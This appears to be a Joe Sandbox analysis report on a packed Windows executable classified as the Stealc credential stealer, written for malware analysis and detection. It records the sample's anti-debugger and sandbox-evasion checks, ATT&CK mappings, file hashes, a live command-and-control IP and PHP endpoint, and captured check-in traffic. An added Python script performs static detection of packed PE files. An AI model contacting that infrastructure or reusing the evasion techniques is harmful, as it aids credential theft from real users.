Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009145C0 VirtualProtect ?,00000004,00000100,00000000 0_2_009145C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00929860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00929750 mov eax, dword ptr fs:[00000030h] 0_2_00929750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_009278E0
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00929600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00929600
Source: file.exe, file.exe, 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00927B90
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00927980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00927980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00927850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00927850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00927A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00927A30

                Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | true | | unknown
http://185.215.113.206/e2b1563c6670f193.php | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/e2b1563c6670f193.php~ | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/lC | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.phpP | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.phpZ | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/e2b1563c6670f193.phpF | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/DCBF360B3297E19BA487R | file.exe, 00000000.00000002.1786322649.00000000006E6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542946
Start date and time: 2024-10-26 23:14:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 84
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217
WHOLESALECONNECTIONSNL | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217
WHOLESALECONNECTIONSNL | mU3Ob2XcCt.dll | malicious | Amadey | 185.215.113.217
WHOLESALECONNECTIONSNL | ZnPyVAOUBc.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.217
No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.948760965439741
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'894'400 bytes
                                      MD5:aa9612d185f329e0f4b0a9525de3b0e1
                                      SHA1:21ad52db3ebef421c02c82070c1ee13ad6c03620
                                      SHA256:c732cac1942cf6a53dbad592bd7599b3410b8f9f090f79060ddd0f6e4d3abd6b
                                      SHA512:5df5ba18ba7a1ea921e3953859010712a776ea598a7e5f169716ccd0b68bf4ab57d8cb451f42277965b59e816f4664d1c4356726f7600837c464816c3c13aa66
                                      SSDEEP:24576:YfXvRRz5hHiz/kVRwNGGzmVeZtm9y/PwlB2HzVm/WbiWk87TyKQFgwfBN+VKnEli:8v5ikV2NGGzNHYeRk8frAPfqVvSYj
                                      TLSH:3895337E1DCCA3B1DDCE3275C36746C63325675383849477AEDAF122194322AE6788E8
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0xab3000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
                                      jmp 00007F0C444AF61Ah
                                      shufps xmm3, dqword ptr [eax+eax], 00h
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [ebx], cl
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+00000000h], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      push es
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | b3a4623a5a41d471ad4ab5002d8f7da9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2ab000 | 0x200 | d4bb3ff44d494b4923a05838297016e5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qyeleazo | 0x509000 | 0x1a9000 | 0x1a8600 | b505e6c864a009a20e6b9fad3a3b957f | False | 0.99490058910162 | OpenPGP Public Key | 7.954246501393021 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wadukluq | 0x6b2000 | 0x1000 | 0x400 | e9f32e65cba2d81a1ea24d67c4bad325 | False | 0.7919921875 | data | 6.142306036595887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6b3000 | 0x3000 | 0x2200 | 571a11a25b4045e90c2656612ae7e227 | False | 0.0881204044117647 | DOS executable (COM) | 1.1210001164843297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Note: every section except .rsrc and .idata is readable, writable and executable, two sections carry no name at all, and the entry point 0xab3000 minus the image base 0x400000 is RVA 0x6b3000, the first byte of .taggant. The 1.6 MB qyeleazo section, with an entropy of 7.95 and a nonsense "OpenPGP Public Key" type guess, is the packed payload.
DLL | Import
kernel32.dll | lstrcpy
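The section and import tables above are what a static triage pass keys on: unnamed or special-character section names, RWX sections, a high-entropy section holding the packed payload, an entry point in a section that is not a normal code section, and an import table reduced to a single kernel32!lstrcpy. The following Python is an added example, not Joe Sandbox's or the sample's code. It parses PE section headers directly (no pefile dependency), computes per-section entropy, and emits those findings; build_sample_pe() constructs a small PE32 image that mirrors the layout in the table (an unnamed RWX section, .idata, a random-named high-entropy RWX section and an entry point inside a trailing .taggant section) so the checks can be run offline. The set of "standard" code section names and the 7.0 entropy threshold are assumptions of this example.

```python
"""PE section triage: the static checks behind the findings in the section table
above (unnamed / special-char section names, RWX sections, high-entropy sections,
entry point outside a standard code section). Added example, not Joe Sandbox code."""
from __future__ import annotations

import math
import random
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}  # assumption: what "standard" means here


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> tuple[int, list[dict]]:
    """Return (AddressOfEntryPoint RVA, section descriptors) from a PE32/PE32+ image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({
            "name": raw_name.rstrip(b"\0").decode("latin-1"),
            "va": va, "vsize": vsize, "raw_size": raw_size, "characteristics": chars,
            "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]),
        })
    return entry_rva, sections


def triage(pe: bytes) -> dict:
    entry_rva, sections = parse_sections(pe)
    findings, entry_section = [], None
    for s in sections:
        name, c = s["name"], s["characteristics"]
        if not name or not all(0x20 < ord(ch) < 0x7F for ch in name):
            findings.append(f"empty/special-char section name at RVA {s['va']:#x}")
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"RWX section {name!r}")
        if s["raw_size"] and s["entropy"] > 7.0:
            findings.append(f"high entropy {s['entropy']:.2f} in {name!r} (packed or encrypted data)")
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_section = name
    if entry_section not in STANDARD_CODE_SECTIONS:
        findings.append(f"entry point {entry_rva:#x} in {entry_section!r}, outside standard code sections")
    return {"entry_section": entry_section, "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed PE32 image with the report's layout (not the real sample): an unnamed
    RWX section, .idata, a random-named high-entropy RWX section, and the entry point
    inside a trailing RWX '.taggant' section."""
    rnd = random.Random(7)
    rwx = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    rw = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    spec = [  # (name, VirtualSize, raw data, Characteristics)
        (b"", 0x25B000, bytes(0x200), rwx),
        (b".idata", 0x1000, bytes(0x200), rw),
        (b"qyeleazo", 0x1000, bytes(rnd.getrandbits(8) for _ in range(0x1000)), rwx),
        (b".taggant", 0x1000, bytes(0x200), rwx),
    ]
    va, raw_ptr, entry_rva = 0x1000, 0x200, 0
    sect_hdrs, payload = b"", b""
    for name, vsize, data, chars in spec:
        if name == b".taggant":
            entry_rva = va
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        payload += data
        va += (vsize + 0xFFF) & ~0xFFF  # SectionAlignment 0x1000
        raw_ptr += len(data)            # FileAlignment 0x200; raw sizes above are multiples of it
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(spec), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)            # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)             # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)       # SectionAlignment, FileAlignment
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect_hdrs).ljust(0x200, b"\0")
    return headers + payload
```

Run triage(open("file.exe", "rb").read()) on a real sample; on the constructed image the findings are the three RWX sections, the empty section name, the high-entropy section and the entry point in .taggant. Entropy alone is a weak signal (compressed resources also score high); it is the combination with RWX permissions and an entry point outside the code section that separates a packer from a benign binary.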
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T23:15:08.696725+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2024 23:15:07.489938974 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 26, 2024 23:15:07.495389938 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 26, 2024 23:15:07.495501995 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 26, 2024 23:15:07.495707035 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 26, 2024 23:15:07.501000881 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 26, 2024 23:15:08.408919096 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 26, 2024 23:15:08.409006119 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 26, 2024 23:15:08.411416054 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 26, 2024 23:15:08.417409897 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 26, 2024 23:15:08.696441889 CEST | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 26, 2024 23:15:08.696724892 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 26, 2024 23:15:11.939229012 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.206
• 185.215.113.206

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7048 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 23:15:07.495707035 CEST | 90 | OUT
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Oct 26, 2024 23:15:08.408919096 CEST | 203 | IN
    HTTP/1.1 200 OK
    Date: Sat, 26 Oct 2024 21:15:08 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
Oct 26, 2024 23:15:08.411416054 CEST | 411 | OUT
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
    Host: 185.215.113.206
    Content-Length: 209
    Connection: Keep-Alive
    Cache-Control: no-cache
